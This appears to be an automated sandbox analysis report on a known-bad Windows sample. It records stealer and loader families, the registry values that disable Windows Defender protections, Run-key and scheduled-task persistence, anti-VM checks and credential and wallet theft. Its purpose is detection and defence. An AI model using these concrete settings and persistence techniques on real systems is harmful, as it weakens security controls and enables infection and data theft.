Analysis Overview
SHA256
a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972
Threat Level: Known bad
The file a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972 was found to be: Known bad.
Malicious Activity Summary
GCleaner
Detect Vidar Stealer
Vidar
Vidar family
Healer
Modifies Windows Defender Real-time Protection settings
Detects Healer an antivirus disabler dropper
Healer family
Litehttp family
LiteHTTP
Modifies Windows Defender DisableAntiSpyware settings
Modifies Windows Defender TamperProtection settings
SystemBC
Amadey family
Stealc family
Stealc
Modifies Windows Defender notification settings
Systembc family
Gcleaner family
Amadey
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Blocklisted process makes network request
Checks computer location settings
Windows security modification
Loads dropped DLL
Executes dropped EXE
.NET Reactor proctector
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Identifies Wine through registry keys
Checks BIOS information in registry
Adds Run key to start application
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Program crash
Browser Information Discovery
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Modifies system certificate store
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Uses Task Scheduler COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-06 02:01
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-06 02:01
Reported
2025-03-06 02:04
Platform
win7-20240729-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
Stealc
Stealc family
SystemBC
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\rbkvgg\bdhx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\rbkvgg\bdhx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\rbkvgg\bdhx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\ProgramData\rbkvgg\bdhx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\765aeb8838.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109140101\\765aeb8838.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\151fdd87ae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109150101\\151fdd87ae.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\ac8277ecde.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109160101\\ac8277ecde.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\b7ef68053e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\b7ef68053e.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\dc32b0ba15.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109130101\\dc32b0ba15.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2112 set thread context of 3008 | N/A | C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe | C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe |
| PID 2796 set thread context of 2088 | N/A | C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2280 set thread context of 2800 | N/A | C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 3512 set thread context of 3992 | N/A | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\rbkvgg\bdhx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
